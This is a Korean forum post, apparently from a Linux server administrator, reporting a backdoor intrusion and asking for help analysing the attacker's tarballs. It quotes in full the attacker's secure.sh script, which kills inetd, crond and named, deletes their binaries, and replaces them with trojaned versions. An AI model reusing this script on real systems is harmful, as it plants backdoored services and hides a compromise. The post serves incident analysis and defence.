>> Edit article
이름
제목
패스워드
위의 화일중의 하나의 스크립트가 이렇게 되어있습니다..... echo "killing ervicec.." killall -9 inetd killall -9 crond killall -9 named echo "removing old files.." rm -rf /usr/sbin/named rm -rf /usr/sbin/crond rm -rf /usr/sbin/in.ftpd rm -rf /var/named/ADMROCKS echo "installing new files.." mv named /usr/sbin/named mv crond /usr/sbin/crond mv in.ftpd /usr/sbin/in.ftpd chmod +x /usr/sbin/named chmod +x /usr/sbin/crond chmod +x /usr/sbin/in.ftpd echo "restarting services.." /usr/sbin/inetd /usr/sbin/crond 위의 스크립트는 위 화일을 바꿔치기 하는 스크립트가 아닌가여?????? ㅠ.ㅠ.ㅠ.ㅠ.ㅠ.ㅠ.ㅠ.ㅠ.ㅠ.ㅠ.ㅠ.ㅠ.ㅠ.ㅠ. : 쩝 해킹의 소식이 이렇게 빠르다니.......... : : 얼마전 백도어 해킹에 서버를 살펴보다보니.............. : : 이상한 계정자가 생성 되어있구........... 그 계정 디렉토리에 : : secure.tgz 화일과 login.tgz 화일이 있고 : : secure.tgz 화일을 풀어보니.... crond 과 in.ftpd , named , 그리고 : : secure.sh 화일이 있더군여.................. : : login.tgz 화일은 풀어서 컴파일한 흔적이 있구여.......... : : 제가 조금전에 링크를 걸어 놨더니 겁나게 많이들 가져 가시더라구여.. : : 만약 해킹에 이용된 도구라면 또다시 이용될까봐 ..... 과감히 삭제하고 : : 파일도 퍼미션을 바꿔 놨습니다.. 좀전가져가신 분들은 파악되시면... : : 저에게 메일 부탁드리구여........................ 글구 위의 파일에 : : 대한 정보를 아시는 분이 있으시다면 말씀좀 부탁드립니다........... : : 또한 위 쏘스를 분석하실수 있으신 진정한 리눅서 께서는 저에게 멜 주시면 : : 위의 쏘스를 보내 드리겠습니다.......
Copyleft
1999-2026 by
JSBoard Open Project
Theme Designed by
IDOO
All right reserved